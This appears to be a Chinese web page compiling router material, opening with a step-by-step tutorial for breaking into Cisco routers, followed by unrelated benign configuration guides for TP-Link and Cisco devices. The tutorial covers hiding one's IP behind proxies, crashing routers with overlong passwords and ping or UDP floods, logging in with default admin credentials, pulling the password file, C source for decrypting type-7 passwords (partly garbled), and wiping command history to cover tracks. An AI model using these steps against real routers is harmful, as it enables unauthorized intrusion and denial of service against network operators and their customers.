拿下CISCO路由器的详细步骤

拿下CISCO路由器的详细步骤

不要用这破坏cisco系统，或非法访问系统。这篇文章只是以学习为目的。只可以用在合法行为，不能破坏

任何系统。这篇文章将一步一步的向你展示如何利用发现的缺陷来获得非法访问。如果你攻入了一个cisco

路由器，或者扰乱了系统，将会中断数百个网络客户机，造成大量损失。所以，只可以在被允许的情况下

进行，否则你将会有许多麻烦！

----------------------------------

目录:

----------------------------------

在你看之前需要了解的:

－什么是IP地址？

－什么是ISP？

－什么是TCP/IP数据包？

－怎样隐藏你的IP地址？

－怎样使用Telnet？

－怎样使用HyperTerminal？

－怎样使用Ping？

－怎样使用TraceRoute？

－怎样使用代理服务器？

-------------------------------------

－第一段：为什么攻击cisco路由器？

－第二段：怎样找到一个cisco路由器？

－第三段：怎样闯入一个cisco路由器？

－第四段：怎样破解密码？

－第五段：怎样使用一个cisco路由器？

----------------------

你看之前需要了解的知识：

----------------------

什么是IP地址？

IP是Internet Protocol的缩写,电脑通过IP地址来识别网络中的其它电脑，与其连接。这就是你为什么会

在IRC中被踢走，并且找到你的ISP和你的大概位置。IP地址是很容易得到的，基本上可以由以下几种方法

获得：

-你访问某网站,你的IP被记录

-在IRC中,某人得到你的IP地址

-在ICQ，OICQ中,可以简单的得到你的IP地址，使用一些小工具。

-如果你的电脑和某人连接起来，运行 systat即可看到和那些电脑连接（以IP 地址显示）

-某人发给你一封用java程序写的邮件，可以得到你的IP地址

还有其它许多方法得到IP地址，包括使用一些木马和后门程序。

-----------

什么是ISP？

ISP是Internet Service Provider的缩写,你通过它们连接到internet.你拨号后就会连接和其连接。我

们可以运行一个traceroute（跟踪路径）来寻找我们的ISP（traceroute 在后面还会介绍).

你应该看到像这样:

tracert 222.222.22.22

Tracing route to [221.223.24.54]

over a maximum of 30 hops.

1 147ms 122ms 132ms your.isp [222.222.22.21]<<<你的ISP

2 122ms 143ms 123ms isp.firewall [222.222.22.20]<

你也可以打开/关闭 "local echo"。如果你打开了"local echo"，你的电脑将显示你输入的任何东西，

并且连接上的电脑将显示回应。

所以你将会看到就像这些：

你输入 "hello",你看到的是

hhelelollo

这是因为返回的信息和你输入的内容已经混合起来了。我这样做的唯一的原因是看连接的机器对我的输入，

是否产生回应。

在默认的情况下，telnet只会通过telnet端口连接，即是断口23。你并不会只通过端口23连接，所以你连

接的时候，你可以任意改变端口。你可以改成25，那是邮件服务程序的端口。也可以是21，那是ftp的端口。

总共有上千个端口，所以你要选择正确的端口！

----------------------

怎样使用超级终端？

超级终端可以让你的电脑的任意端口进行监听某台电脑，如果有信息来到这个端口，就可以进行传输件。超

级终端在开始>程序>附件>通讯中，没有的话，你可以通过控制面板中安装。首先，你要选择连接协议，我

们选"TCP/IP Winsock"，接着输入要连接的电脑，下面选择端口。可以选择Call>Wait for Call，来等待

文件。这样其它的电脑就可以通过某个端口连接上你了，你也可以聊天，或者传送文件了。

:我的超级终端可能不一样，没有这个功能。

------------

怎样使用Ping？

Ping的使用很简单，在MS-DOS方式下，输入“ping IP地址”，默认是ping 三次，你也可以自己设定。

"ping ip地址 -t"

可以使其不停的ping。

改变 ping 的大小可以这样做:

"ping -l (size) ip.address"

ping其实是向远程的机器发送数据包，远程的机器接收到就会把数据包原路返回，我们可以看到这个过程的

时间。时间越短，速度就越快，当然，拥挤的时候，就会发生数据包丢失。 Ping 会减慢被ping的电脑的速

度，流量过大的时候，甚至使其down机。一分钟的ping攻击就可以使一台win98的电脑崩溃。(因为它的连接

缓冲区溢出 - 连接过量，所以Windows决定休息休息了:>).ping攻击也会占用你许多带宽，所以你的带宽要

比目标机器大(除非目标机器运行的是Windows 98，而且你有个不错的猫，那么一分钟内，你就可以叫它下台).

Ping攻击对强壮的系统没有效果。

注意: DOS’s -t 选项不是一个ping攻击,它只是很小的连接一下，而且中间有很多间隔。在Unix或Linux

的机器中，你可以用上参数－f 进行真正的ping攻击。其实，如果你的分布是POSIX-compliant (POSIX -

Portable Operating System Interface based on uniX)，否则那就不是真正的Unix/Linux 分布。那

么如果你有个 OS，称自己既是Unix，又是Linux，那么就是有－f 。

------------------

怎样使用TraceRoute？

要跟踪你的连接（可以观察到目标机器的连接路线），只要在MS-DOS方式下，输入“tracert IP 地址”。你

将会看到一个电脑的目录，就是你和目标之间通过的机器。.

你可以用此方法确定是否存在防火墙，也可以确定某人的ISP(internet service provider)。

要确定ISP，只要看目标机器的前一个IP地址，那就应该是ISP的路由器。

基本上说，这就是traceroute怎样工作－一个 TCP/IP 数据包，在它的头部有一个值(在IP的头部。如果你不

知道这是什么意思，没关系，你接着往下看就可以了)称作 TTL,它是Time To Live的缩写。当一个数据包通过

路由器的时候，它的TTL值就会减少。这样可能会使数据包在网络中流窜，消耗带宽。所以每当一个数据包TTL

值达到0的时候，它就会失效并且因为一个ICMP错误返回到发送者。现在traceroute 先发送一个TTL值为1的

数据包，那么它很快就会返回。查看ICMP错误的头部，traceroute就可以知道数据包第一

步通过哪。接着就

会发送TTL值为2的数据包，返回后，就是第二次通过的地方。依次下去，直到最终的目的地，就可以知道整个

路径。

现在你是不是明白了呢? :-)

------------------

怎样使用代理服务器？

在网上寻找一个代理服务器，包括你需要的打开的端口的代理服务器。找到后，你可以用telnet 或

hyperterminal通过代理服务器连接到另外一台电脑上。这样做对方的电脑就不可以确定你的IP地址。

-----------------------------

第一段：为什么攻击cisco路由器？

你可能会想.. 为什么要攻击 cisco 路由器呢?

答案就是那样做将对闯入其它的系统非常有用...

Cisco路由器非常的快，在一个系统中，一些会是以18 T1连接。而且它们非常灵活，尽管大多数运行

telnet，但是它们可以在DoS攻击或攻入其它系统时发挥作用。

它们同时还会有成千的数据包通过。但是可以被捕获进行译码...许多的cisco路由器受托于系统，它们

可以让你获得其网络中访问其它电脑的确切的数量。

------------------------------

第二段：怎样找到一个cisco路由器？

寻找一个cisco路由器可以说是以项简单的任务，几乎所有的ISP至少通过一个cisco路由器。最简单的

方法是在dos下运行tracert，你可以跟踪到电脑之间的许多电脑，在这之间，必有一个“cisco”这个

名字。如果你发现了，记下它的IP地址。

:在中国未必有cisco这个名字，但是肯定有路由器的，你可以用SuperScan扫描前两个IP 地址，

看哪个开2001端口（Cisco路由器管理）和23端口即是的啦！

现在，你有cisco路由器的位置了，但是它可能还有一个防火墙保护它，所以你要检查一下它是否被封

锁ping连接的次数，如果有回应，它就有可能未被封锁。另外一种方法就是试着访问cisco 路由器的一些

端口。你用telnet即可，端口23，如果它要输入密码，未叫输入用

户名，你就可能在一个防火墙。

试着找一个未受防火墙保护的路由器，因为这篇教程主题是路由器，不是教你怎样通过防火墙。当你确

信找到一个好的系统，你应该找一个可以使用23端口的代理服务器，这样你的IP地址就不会被路由器记

录下来了。:找到一台运行Wingate的机器即可。

---------------------------------

第三段：怎样闯入一个cisco路由器？

Cisco路由器运行 V4.1 版本的软件（现在普遍使用的），这很容易干掉。你只要通过代理服务器连接到

一个cisco路由器，输入一串很长的密码，如：

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019 dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019 dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019 dsk

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019 dsk

现在开始等，cisco系统将会重新启动，可以说你已经攻击它，使它离线了...但是过2-10分钟，它就会

恢复，我们应该进入它。

如果什么都没发生,那么它运行的不是脆弱的软件,你可以多试几种DoS攻击，比如大量的 ping.到dos下，

输入 "ping -l 56550 cisco.router.ip -t",这会起到同样的效果.

:很有可能以上两种方法都不行，反正是要其down机，那么试试那个攻击yahoo的udpFlood，一定可以使其down机。一定要注意小心啊！我相信你应该知道该怎么保护自己。

如果它被动结,就另找一个代理服务器进行连接。并且用户名为"admin"，密码为

"admin"，因为这是默认的。

因为当它暂时的disabled，它将恢复到默认状态。

:你到我主页，会有一篇文章包括几乎所有的路由器的默认用户名和密码

现在，你已经进入了，你应该获得密码文件！系统运行不同的软件，但大部分有个像"htl-textil"

这类的提示，现在输入"?"，观看命。你会看到有很多的命令，你会发现一个传送命令，用这个命令，在当前

Admin用户的情况下，把密码文件发送到你的电脑23端口上。但是在这之前，你要把你的超级终端设定好。你发

送文件之后，超级终端将问你是否接收文件，你选择是并保存在电脑中即可。你通过了最难的部分，下面准备开始破解密码。

--------------------

第四段：怎样破解密码？

现在，你获得了密码文件，你要破解它才能继续进入路由器。所以你可以运行John the Ripper之类的软件破

译它。

这是我推荐的最简单的方法.另一种方法是试着把它解码。这样做需要一个解码软件，使用某些解码软件，你还

要有足够的耐心。

这儿有一个专门为cisco路由器密码文件解码的软件，你可以在Linux中编译它:

#include

#include

char xlat[] = {

0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,

0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,

0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44

};

char pw_str1[] = "password 7 ";

char pw_str2[] = "enable-password 7 ";

char *pname;

cdecrypt(enc_pw, dec_pw)

char *enc_pw;

char *dec_pw;

{

unsigned int seed, i, val = 0;

if(strlen(enc_pw) & 1)

return(-1);

seed = (enc_pw[0] - Ɔ’) * 10 + enc_pw[1] - Ɔ’

if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1])) return(-1);

for (i = 2 ; i <= strlen(enc_pw); i++) {

if(i !=2 && !(i & 1)) {

dec_pw[i / 2 - 2] = val ^ xlat[seed++];

val = 0;

}

val *= 16;

if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {

val += enc_pw[i] - Ɔ’

continue;

}

if(enc_pw[i] >= ’A’ && enc_pw[i] <= ’F’) {

val += enc_pw[i] - ’A’ + 10;

continue;

}

if(strlen(enc_pw) != i)

return(-1);

}

dec_pw[++i / 2] = 0;

return(0);

}

usage()

{

fprintf(stdout, "Usage: %s -p \n", pname); fprintf(stdout, " %s \n", pname);

return(0);

}

main(argc,argv)

int argc;

char **argv;

{

FILE *in = stdin, *out = stdout;

char line[257];

char passwd[65];

unsigned int i, pw_pos;

pname = argv[0];

if(argc > 1)

{

if(argc > 3) {

usage();

exit(1);

}

if(argv[1][0] == ’-’)

{

switch(argv[1][1]) {

case ’h’:

usage();

break;

case ’p’:

if(cdecrypt(argv[2], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

fprintf(stdout, "password: %s\n", passwd); break;

default:

fprintf(stderr, "%s: unknow option.", pname); }

return(0);

}

if((in = fopen(argv[1], "rt")) == NULL)

exit(1);

if(argc > 2)

if((out = fopen(argv[2], "wt")) == NULL)

exit(1);

}

while(1) {

for(i = 0; i < 256; i++) {

if((line[i] = fgetc(in)) == EOF) {

if(i)

break;

fclose(in);

fclose(out);

return(0);

}

if(line[i] == ’\r’)

i--;

if(line[i] == ’\n’)

break;

}

pw_pos = 0;

line[i] = 0;

if(!strncmp(line, pw_str1, strlen(pw_str1)))

pw_pos = strlen(pw_str1);

if(!strncmp(line, pw_str2, strlen(pw_str2)))

pw_pos = strlen(pw_str2);

if(!pw_pos) {

fprintf(stdout, "%s\n", line);

continue;

}

if(cdecrypt(&line[pw_pos], passwd)) {

fprintf(stderr, "Error.\n");

exit(1);

}

else {

if(pw_pos == strlen(pw_str1))

fprintf(out, "%s", pw_str1);

else

fprintf(out, "%s", pw_str2);

fprintf(out, "%s\n", passwd);

}

}

}

如果你没有使用Linux，你就只好用John the Ripper之类的软件，带上密码档，进行暴利破解。

-------------------------------

第五段：怎样使用一个cisco路由器？

要使用它，你先必须连接到它，你可以用代理，以免你的IP地址被记下。当你进入的时候，如果你想关闭

历史记录来掩盖你的行为，你只要输入"terminal history size 0"。这样就不会被记下什么了! 输入 "?"

来看路由器中的命令，大多数你都可以用的。

这些路由器一般都有telnet，所以你可以通过telnet连接到其它的系统上(比如unix boxes)，并且攻击

它们。你还可以使用ping 和 traceroute 进行跟踪系统或进行DoS攻击。你也可以监听数据包，但我不推荐

这样做，因为并不是一定成功，而且会被发现....

---------------------------------

如果你第一次没有攻入cisco，不要担心...你一两次是不可能成功的。它需要不断的练习和超强的耐力。

这儿只向你将怎样做...一定要在合法的情况下进行啊！

路由器的设置方法(图解)

[教程资料] 路由器的设置方法(图解) 路由器, 图解, 设置 路由器的设置方法(图解) tp-link各产品开启路由器的方法首先介绍一下利用路由器实现多台电脑同时上网的方法．首先具备的条件是：路由器一个（可以为４口，８口，１６口，甚至更多的），如果你有很多台电脑，可以买个多口的交换机．网线直通线数条，电信mode一个（或者你是专线那就不需要mode了）,pc电脑至少２台以上（如果只有一台，使用路由器是可以的，但是就失去了使用路由器的意义了．其实tp-link公司出的路由器，比如TP-LINKTL-402M 或者是401M或者是其他型号的tp-link路由器，路由开启方法大多差不多．下面本文以 TP-LINKTL-402M为例，请看图片 只要按图片里的介绍，将ＰＣ，电信宽带ＭＯＤＥ，路由器，相互正确连接，那么一个网络就已经组好了．下面介绍怎么样开起路由功能．如果线都已经接好．我们这个时候随便打开一台连好的ＰＣ电脑．打开网上邻居属性(图片2)，本地连接属性(图片3)，tcp/ip协议属性(图片4)，设置ip为192.168.1.2子网:255.255.255.0网关:192.168.1.1(图片5)确定，DNS在配置路由器完后在行设置.注：如果是98和me系统，请到控制面板网络连接

去设置．这里xp为例，请看图

对了,这里提醒一下大家,ip设置网段,可以设置在192.168.1.2-192.168.1.254之间都可以,不要将同一IP设置为多台电脑,这样就会引起IP冲突了.切记.好了当设置到这里.我就可以打开桌面的InternetExplorer,输入192.168.1.1回车,请看图片

Cisco设备的基本配置命令

switch> 用户模式 1：进入特权模式 enable switch> enable switch# 2：进入全局配置模式 configure terminal switch> enable switch＃c onfigure terminal switch(conf)# 3：交换机命名 hostname aptech2950 以aptech2950为例 switch> enable switch＃c onfigure terminal switch(conf)#hostname aptch-2950 aptech2950(conf)# 4：配置使能口令 enable password cisco 以cisco为例 switch> enable switch＃c onfigure terminal switch(conf)#hostname aptch2950 aptech2950(conf)# enable password cisco 5：配置使能密码 enable secret ciscolab 以cicsolab为例 switch> enable switch＃c onfigure terminal switch(conf)#hostname aptch2950 aptech2950(conf)# enable secret ciscolab 6：设置虚拟局域网vlan 1 interface vlan 1 switch> enable switch＃c onfigure terminal switch(conf)#hostname aptch2950 aptech2950(conf)# interface vlan 1 aptech2950(conf-if)#ip address 192.168.1.1 255.255.255.0 配置交换机端口ip 和子网掩码 aptech2950(conf-if)#no shut 是配置处于运行中aptech2950(conf-if)#exit aptech2950(conf)#ip default-gateway 192.168.254 设置网关地址 7：进入交换机某一端口 interface fastehernet 0/17 以17端口为例switch> enable switch＃c onfigure terminal switch(conf)#hostname aptch2950 aptech2950(conf)# interface fastehernet 0/17 aptech2950(conf-if)#

最新思科CISCO路由器配置步骤

前思科路由器已经成为路由行业的领军人物，可能好多人还不了解Cisco路由器配置的步骤，没有关系，看完本文你肯定有不少收获，希望本文能教会你更多东西，该单位公司总部在北京，全国有3个分支机构。 要求做到在4个地点的数据能够实时查询，便于业务员根据具体情况作出正确决策。早期方案是使用路由器，通过速率为256Kbps的DDN专网连接北京总部。但技术人员通过市场调研，发现该网络运营成本过高。通过进一步的咨询和调整，最终方案是分支机构使用DDN在本地接入Internet，总部使用以太网就近接入Internet。并对互联的Cisco路由器配置，使用VPN技术，保证内部数据通过Internet安全传输。该企业的网络分布见附图。 配置过程及测试步骤 在实施配置前，需要检查硬件和软件是否支持VPN。对于Cisco路由器配置，要求IOS 版本高于12.0.6(5)T，且带IPSec功能。本配置在Cisco路由器配置通过。以下是分支网络1的路由器实际配置过程，其他路由器的配置方法与此基本一致，只需修改具体的环境参数(IP 地址和接口名称)即可。 配置路由器的基本参数，并测试网络的连通性 (1) 进入Cisco路由器配置模式 将计算机串口与路由器console口连接，并按照路由器说明书配置“终端仿真”程序。执行下述命令进入配置模式。 Router>en Router#config terminal Router(config)# (2)配置路由器的基本安全参数 主要是设置特权口令、远程访问口令和路由器名称，方便远程调试。 Router(config)#enable secret xxxxxxx Router(config)#line vty 0 4 Router(config-line)#password xxxxxx Router(config-line)#exit Router(config)#hostname huadong

CISCO路由器配置基础

路由器是计算机网络的桥梁，是连接IP网的核心设备。通过它不仅可以连通不同的网络，还能选择数据传送的路经，并能阻隔非法访问。路由器的配置对初学者来说，并不是件容易的事。现以CISCO路由器为例，将路由器的一般常识和配置介绍给大家，供朋友们在配置路由器时参考。 一、路由器的一般常识 路由器具有创建路由、执行命令以及在网络接口上使用路由协议对数据包进行路由等功能。它的是接口、CPU和存在器，软件基础是网络互联操作系 统IOS。 1、路由器接口 ·路由器接口用作将路由器连接到网络，可以分为局域网接口和广域网接口两种。由于路由器型号的不同，接口数目和类型也不尽一样。常见的接口主要有以下几种： ·高速同步串口，可连接DDN，帧中继（Frame Relay），X.25，PSTN（模拟线路）。 ·同步/异步串口，可用软件将端口设置为同步工作方式。 ·AUI端口，即粗缆口。一般需要外接转换器（AUI-RJ45），连接10Base-T以太网络。 ·ISDN端口，可以连接ISDN网络(2B+D)，可作为局域网接入Inter 之用。·AUX端口，该端口为异步端口，主要用于远程配置，也可用于拔号备份，可 与MODEM连接。支持硬件流控制（Hardware Flow Ctrol）。 ·Console端口，该端口为异步端口，主要连接终端或运行终端仿真程序的计算机，在本地配置路由器。不支持硬件流控制。 2、路由器的CPU 路由器和PC机一样，有中央处理单元CPU，而且不同的路由器，其CPU一般也不相同，CPU是路由器的处理中心。 3、路由器的内存组件 内存是路由器存储信息和数据的地方，CISCO路由器有以下几种内存组件：·ROM（Read Only Memory） ·ROM中存储路由器加电自检（POST：Power-On Self-Test）、启动程序（Bootstrap Program）和部分或全部的IOS。路由器中的ROM是可擦写的，所以IOS是可以升级的。 ·NVRAM(Nonvolatile Random Memory)

1-cisco路由器基本配置及远程登录

实训目的： （1）学习和掌握科路由器的配置方式和要求。 （2）学习和掌握科路由器的工作模式分类、提示符、进入方式。1、路由器的配置方式 ①超级终端方式。该方式主要用于路由器的初始配置，路由器不需要IP地址。基本方法是：计算机通过COM1/COM2口和路由器的Console口连接，在计算机上启用“超级终端”程序，设置“波特率：9600 ，数据位：8，停止位：1，奇偶校验: 无，校验：无”即可。常用 ②Telnet方式。该方式配置要求路由器必须配置了IP地址。基本方法是：计算机通过网卡和路由器的以太网接口相连，计算机的网卡和路由器的以太网接口的IP地址必须在同一网段。常用 ③其他方式：AUX口接MODEM，通过电话线与远方运行终端仿真软件的微机；通过Ethernet上的TFTP服务器；通过Ethernet上的SNMP网管工作站。 2、路由器的工作模式 在命令行状态下，主要有以下几种工作模式： ①一般用户模式。主要用于查看路由器的基本信息，只能执行少数命令，不能对路由 器进行配置。提示符为：Router>；进入方式为：Telnet或Console ②使能（特权）模式。主要用于查看、测试、检查路由器或网络，不能对接口、路由 协议进行配置。提示符为：Router#；进入方式为：Router>enable。 ③全局配置模式。主要用于配置路由器的全局性参数。提示符为：Router(config)#； 进入方式为：Router#config ter。 ④全局模式下的子模式。包括：接口、路由协议、线路等。其进入方式和提示符如下： Router(config)#ineterface e0 //进入接口模式 Router(config-if)#//接口模式提示符 Router(config)#rip //进入路由协议模式 Router(config-router)# //路由协议模式 Router(config)#line con 0 //进入线路模式

通用路由器配置说明

通用路由器配置说明 一、网络摄像机外网访问在公司路由器里的设置 点击转发规则 虚拟服务器 内部端口，外部端口填写网络摄像机里配置的端口，IP是网络摄像机里填写的IP地址填写完确定就行了。

因iCanSee系统完全基于网络运行，路由器在其中扮演了重要的角色。本文以TP-LINK无线路由器为例，简要说明路由器的配置 一、TP-Link TL-WRXX系列路由器配置指南 对路由器进行基本配置，使电脑通过路由器实现共享上网，过程相对来说比较容易实现；这篇文档下面的内容，主要讲述如下几部分： 收集并判断信息，为配置路由器做准备； 进入路由器管理界面，对路由器进行配置； 配置过程简单的故障定位排除！

1、配置路由器前的准备工作 常见的硬件连接方式有下面几种： 电话线→ADSL MODEM→电脑 双绞线（以太网线）→电脑 有线电视（同轴电缆）→Cable MODEM→电脑 光纤→光电转换器→代理服务器→PC ADSL / VDSL PPPoE：电脑上运行第三方拨号软件如Enternet300或WinXP 系统自带的拨号程序，填入ISP提供的账号和密码，每次上网前先要拨号； 或者您的ADSL MODEM已启用路由功能，填入了ISP提供的账号和密码，拨号的动作交给MODEM 去做； 静态IP：ISP提供给您固定的IP地址、子网掩码、默认网关、DNS； 动态IP：电脑的TCP/IP属性设置为“自动获取IP地址”，每次启动电脑即可上网； 802.1X+静态IP：ISP提供固定的IP地址，专用拨号软件，账号和密码； 802.1X+动态IP：ISP提供专用拨号软件，账号和密码； WEB认证：每次上网之前，打开IE浏览器，先去ISP指定的主页，填入ISP提供的用户名密码，通过认证以后才可以进行其他得上网操作； 2、怎样进入路由器管理界面？ 先参照《用户手册》上面的图示，将ADSL MODEM、路由器、电脑连结起来。TL-W RXX系列路由器的管理地址出厂默认： IP地址：192.168.1.1， 子网掩码：255.255.255.0 （TL-R400和TL-R400+两款的管理地址默认为：192.168.123.254，子网掩码：255. 255.255.0） 用网线将路由器LAN口和电脑网卡连接好，因为路由器上的以太网口具有极性自动翻转功能，所以无论您的网线采用直连线或交叉线都可以，需要保证的是网线水晶头的制作牢靠稳固，水晶头铜片没有生锈等。 电脑桌面上右键点击“网上邻居”→“属性”，在弹出的窗口中双击打开“本地连接”，在弹出的窗口中点击“属性”，然后找寻“Internet协议（TCP/IP）”，双击弹出“Intern et协议（TCP/IP）属性”窗口； 在这个窗口中选择“使用下面的IP地址”，然后在对应的位置填入： IP地址：192.168.1.X（X范围2-254） 子网掩码：255.255.255.0 默认网关：192.168.1.1，填完以后““确定”两次即可；

Cisco路由器的SSH配置详解

C i s c o路由器的S S H配 置详解 The document was finally revised on 2021

Cisco路由器的SSH配置详解 2008-06-18 13:04 如果你一直利用Telnet控制网络设备，你可以考虑采用其他更安全的方式。 本文告诉你如何用SSH替换Telnet. 使用Telnet这个用来访问远程计算机的TCP/IP协议以控制你的网络设备相当于在离开某个建筑时大喊你的用户名和口令。很快地，会有人进行监听，并且他们会利用你安全意识的缺乏。 SSH是替代Telnet和其他远程控制台管理应用程序的行业标准。SSH命令是加密的并以几种方式进行保密。 在使用SSH的时候，一个数字证书将认证客户端（你的工作站）和服务器（你的网络设备）之间的连接，并加密受保护的口令。SSH1使用RSA加密密钥，SSH2使用数字签名算法（DSA）密钥保护连接和认证。 加密算法包括Blowfish，数据加密标准（DES），以及三重DES （3DES）。SSH保护并且有助于防止欺骗，“中间人”攻击，以及数据包监听。 实施SSH的第一步是验证你的设备支持SSH.请登录你的路由器或交换机，并确定你是否加载了一个支持SSH的IPSec IOS镜像。 在我们的例子中，我们将使用Cisco IOS命令。运行下面的命令： 该命令显示已加载的IOS镜像名称。你可以用结果对比你的供应商的支持特性列表。 在你验证了你的设备支持SSH之后，请确保设备拥有一个主机名和配置正确的主机域，就像下面的一样： 在这个时候，你就可以启用路由器上的SSH服务器。要启用SSH服务器，你首先必须利用下面的命令产生一对RSA密钥：

思科交换机命令大全 + Cisco IOS 基本命令

思科交换机命令大全 （一） 序号/类别基于ios的交换机命令基于CLI的交换机命令 1．设置主机名/系统名switch(config)# hostname "hostname" switch(enable) set system name name-string 2．设置登录口令switch(config)# enable password level 1 password switch(enable) set password switch(enable) set enalbepass 3．设置远程访问switch(config)# inte***ce vlan 1 switch(config-if)# ip address ip-address netmask switch(config-if)# ip default-gateway ip-address switch(enable) set inte***ce sc0 ip-address netmask broadcast-address switch(enable) set inte***ce sc0 vlan switch(enable) set ip route default gateway 4．启用和浏览CDP信息switch(config-if)# cdp enable switch(config-if)# no cdp enable switch(enable) set cdp {enable|disable} module/port 5．查看Cisco邻接设备的CDP通告switch# show cdp inte***ce [type modle/port] switch# show cdp neighbors [type module/port] [detail] switch(enable) show cdp neighbors[module/port] [vlan|duplex|capabilities|detail] 6．端口描述switch(config-if)#description escription-string switch(enable)set port name module/number description-string 7．设置端口速度switch(config-if)# speed{10|100|auto} switch(enable) set port speed moudle/number {10|100|auto} switch(enable) set port speed moudle/number {4|16|auto} 8．设置以太网的链路模式switch(config-if)# duplex {auto|full|half} switch(enable) set port duplex module/number {full|half 9．配置静态VLAN switch# vlan database switch(vlan)# vlan vlan-num name vla switch(vlan)# exit switch# configure teriminal switch(config)#inte***ce inte***ce module/number switch(config-if)# switchport mode access switch(config-if)# switchport access vlan vlan-num switch(config-if)# end switch(enable) set vlan vlan-num [name name] switch(enable) set vlan vlan-num mod-num/port-list 10．配置VLAN中继线switch(config)# inte***ce inte***ce mod/port switch(config-if)# switchport mode trunk switch(config-if)#switchport trunk encapsulation {isl|dotlq} switch(config-if)# switchport trunk allowed vlan remove vlan-list switch(config-if)# switchport trunk allowed vlan add vlan-list switch(enable)set trunk module/port [on|off|desirable|auto|nonegotiate] Vlan-range [isl|dotlq|dotl0|lane|negotiate] 11．配置VTP管理域switch# vlan database

思科中路由器的基础配置命令

思科中路由器的基础配置命令。 Cd 更改路径 Cdp enable 允许接口运行CDP协议 Clear 复位功能 Clear counters 清除接口计数器 Clear interface 重新启动接口上的件逻辑 Clockrate 设置串口硬件连接的时钟速率，如网络接口模块和接口处理器能接受的速率Cmt 开启/关闭FDDI连接管理功能 Config-register 修改配置寄存器设置 Configure 允许进入存在的配置模式，在中心站点上维护并保存配置信息 Configure memory 从NVRAM加载配置信息 Configure terminal 从终端进行手动配置 Connect 打开一个终端连接 Copy 复制配置或映像数据 Copy flash tftp 备份系统映像文件到TFTP服务器 Copy running-config startup-config 将RAM中的当前配置存储到NVRAM Copy running-config tftp 将RAM中的当前配置存储到网络TFTP服务器上 Copy tftp flash 从TFTP服务器上下载新映像到Flash Copy tftp running-config 从TFTP服务器上下载配置文件 Debug 使用调试功能 Debug dialer 显示接口在拨什么号及诸如此类的信息 Debug ip rip 显示RIP路由选择更新数据

Debug ipx routing activity 显示关于路由选择协议(RIP)更新数据包的信息 Debug ipx sap 显示关于SAP（业务通告协议）更新数据包信息 Debug isdn q921 显示在路由器D通道ISDN接口上发生的数据链路层（第2层）的访问过程 Debug ppp 显示在实施PPP中发生的业务和交换信息 Delete 删除文件 Deny 为一个已命名的IP ACL设置条件 Dialer idle-timeout 规定线路断开前的空闲时间的长度 Dialer map 设置一个串行接口来呼叫一个或多个地点 Dialer wait-for-carrier-time 规定花多长时间等待一个载体 Dialer-group 通过对属于一个特定拨号组的接口进行配置来访问控制 Dialer-list protocol 定义一个数字数据接受器（DDR）拨号表以通过协议或ACL与协议的组合来控制控制拨号 Dir 显示给定设备上的文件 Disable 关闭特许模式 Disconnect 断开已建立的连接 Enable 打开特许模式 Enable password 确定一个密码以防止对路由器非授权的访问 Enable password 设置本地口令控制不同特权级别的访问 Enable secret 为enable password命令定义额外一层安全性(强制安全，密码非明文显示) Encapsulation frame-relay 启动帧中继封装 Encapsulation novell-ether 规定在网络段上使用的Novell独一无二的格式 Encapsulation PPP 把PPP设置为由串口或ISDN接口使用的封装方法

图解思科路由器配置教程

cisco路由器配置教程 手把手教你配置cisco路由器 经过几十年的发展,从最初的只有四个节点的ARPANET发展到现今无处不在的Internet,计算机网络已经深入到了我们生活当中。随着计算机网络规模的爆炸性增长,作为连接设备的路由器也变得更加重要。 公司在构建网络时，如何对路由器进行合理的配置管理成为网络管理者的重要任务之一。本专题就为读者从最简单的配置开始为大家介绍如何配置cisco路由器。 很多读者都对路由器的概念非常模糊，其实在很多文献中都提到，路由器就是一种具有多个网络接口的计算机。这种特殊的计算机内部也有CPU、内存、系统总线、输入输出接口等等和PC相似的硬件，只不过它所提供的功能与普通计算机不同而已。 和普通计算机一样，路由器也需要一个软件操作系统，在cisco 路由器中，这个操作系统叫做互联网络操作系统，这就是我们最常听到的IOS 软件了。下面就请读者跟着我们来一步步的学习最基本的路由器配置方法。 cisco路由器基本配置： √ cisco IOS软件简介： 大家其实没必要把路由器想的那么复杂，其实路由器就是一个具有多个端口的计算机，只不过它在网络中起到的作用与一般的PC不同而已。和普通计算机一样，路由器也需要一个操作系统，cisco把这个操作系统叫作cisco互联网络操作系统，也就是我们知道的IOS，所有cisco路由器的IOS都是一个嵌入式软件体系结构。

cisco IOS软件提供以下网络服务： 基本的路由和交换功能。 可靠和安全的访问网络资源。 可扩展的网络结构。 cisco命令行界面（CLI）用一个分等级的结构，这个结构需要在不同的模式下来完成特定的任务。例如配置一个路由器的接口，用户就必须进入到路由器的接口配置模式下，所有的配置都只会应用到这个接口上。每一个不同的配置模式都会有特定的命令提示符。EXEC为IOS软件提供一个命令解释服务，当每一个命令键入后EXEC便会执行该命令。 √第一次配置Cisco路由器： 在第一次配置cisco路由器的时候，我们需要从console端口来进行配置。以下，我们就为大家介绍如何连接到控制端口及设置虚拟终端程序。 1、使用rollover线和一个RJ45和DB9或者DB25的转换适配器连接路由器控制端口和终端计算机。

CISCO 常用命令解释

视图模式介绍： 普通视图 router> 特权视图 router# /在普通模式下输入enable 全局视图 router(config)# /在特权模式下输入config t 接口视图 router(config-if)# /在全局模式下输入int 接口名称例如int s0或int e0 路由协议视图 router（config-route）# /在全局模式下输入router 动态路由协议名称 1、基本配置： router>enable /进入特权模式 router#conf t /进入全局配置模式 router(config)# hostname xxx /设置设备名称就好像给我们的计算机起个名字 router(config)#enable password /设置特权口令 router(config)#no ip domain lookup /不允许路由器缺省使用DNS解析命令 router(config)# Service password-encrypt /对所有在路由器上输入的口令进行暗文加密router(config)#line vty 0 4 /进入设置telnet服务模式 router(config-line)#password xxx /设置telnet的密码 router(config-line)#login /使能可以登陆 router(config)#line con 0 /进入控制口的服务模式 router(config-line)#password xxx /要设置console的密码 